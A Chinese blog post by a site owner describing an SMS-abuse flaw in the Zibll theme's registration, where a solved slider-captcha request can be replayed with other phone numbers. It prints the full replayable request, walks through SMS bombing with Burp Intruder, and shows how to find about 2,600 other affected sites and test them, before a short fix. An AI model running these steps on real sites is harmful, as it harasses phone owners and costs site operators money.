记猪头网站短信利用漏洞

杂谈

深夜醒来,接收到了阿里的短信提醒

图片[1]-记猪头网站短信利用漏洞-FancyPig's blog

想想我这个日活5-6k人的小站也被黑产盯上了?我记得在短信注册的时候是有滑动验证的

图片[2]-记猪头网站短信利用漏洞-FancyPig's blog

难道说?这里面有漏洞?

漏洞复现

我们打开burpsuite,启用拦截功能,可以看到intercept is on

图片[3]-记猪头网站短信利用漏洞-FancyPig's blog

这里打开一个注册页面,输入手机号然后点击获取验证码

图片[4]-记猪头网站短信利用漏洞-FancyPig's blog

然后,会出现图像滑块验证,我们进行滑动,然后抓包

图片[5]-记猪头网站短信利用漏洞-FancyPig's blog

我们可以看到payload如下,主要的参数即为email_phone=,后面接上手机号

name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true

那么,我们来测试下,这个验证码是否能被重复利用,我们右键,选择Send to Repeater

图片[6]-记猪头网站短信利用漏洞-FancyPig's blog

然后看看能不能修改号码重新发包,我这里改成另一个手机号,点击send发送

图片[7]-记猪头网站短信利用漏洞-FancyPig's blog

居然发送成功了

图片[8]-记猪头网站短信利用漏洞-FancyPig's blog

然后,我看了下手机,确实收到了

图片[9]-记猪头网站短信利用漏洞-FancyPig's blog

那么,那些做黑产的又是如何通过我们这个漏洞制造的短信轰炸呢?

他们有很多代理池,通过频繁请求我们刚才的接口就可以完成所谓的短信轰炸……

这里,我们也简单来讲解一下,其实通过burpsuite里的暴破模式也可以间接实现

我们把刚才的包发送到入侵模块,点击Send to Intruder

图片[10]-记猪头网站短信利用漏洞-FancyPig's blog

我们先点击clear,清除没用的变量

图片[11]-记猪头网站短信利用漏洞-FancyPig's blog

然后,我们勾选手机号作为变量,点击Add $,他会在你的手机号前后都加上$

图片[12]-记猪头网站短信利用漏洞-FancyPig's blog

然后我们在payload中,导入任意手机号,你可以自行生成一些随机的手机号

我们随便生成了100个

图片[13]-记猪头网站短信利用漏洞-FancyPig's blog

然后点Load导入

图片[14]-记猪头网站短信利用漏洞-FancyPig's blog

然后点击start attack,短信就会被疯狂刷了,一条四分钱,猪猪直接流泪

图片[15]-记猪头网站短信利用漏洞-FancyPig's blog

然后就看到短信喀喀喀的被刷了……

图片[16]-记猪头网站短信利用漏洞-FancyPig's blog

实录

由于猪猪的主题用的是子比主题,很多同行站长也表示,实在是太难受了

图片[17]-记猪头网站短信利用漏洞-FancyPig's blog

看看视频里的就很惨哦

如何发现其他有此接口的同类站长

我们可以参考之前的文章

这里使用的奇安信的hunter平台,我们先获取icon

图片[18]-记猪头网站短信利用漏洞-FancyPig's blog

然后上传

图片[19]-记猪头网站短信利用漏洞-FancyPig's blog

点击确定,就可以搜索了

图片[20]-记猪头网站短信利用漏洞-FancyPig's blog

hunter这里只爆了5个资产

图片[21]-记猪头网站短信利用漏洞-FancyPig's blog

看样子图标不太行,我们再换一种搜索方式

web.body="子比"
图片[22]-记猪头网站短信利用漏洞-FancyPig's blog

看起来这个就很多了,可以看到有2600多条资产

图片[23]-记猪头网站短信利用漏洞-FancyPig's blog

然后,你就可以去测试了,看看这里面的网站是不是也存在我这样的漏洞呢?

如何修复漏洞

修复漏洞这里建议采用token验证方式,需要服务端生成token然后每次请求短信接口都需要做token校验,token如果不正确则无法发送短信!单纯的验证IP几乎是无效的策略!

© 版权声明
THE END
喜欢就支持一下吧
点赞163赞赏 分享
评论 共20条

请登录后发表评论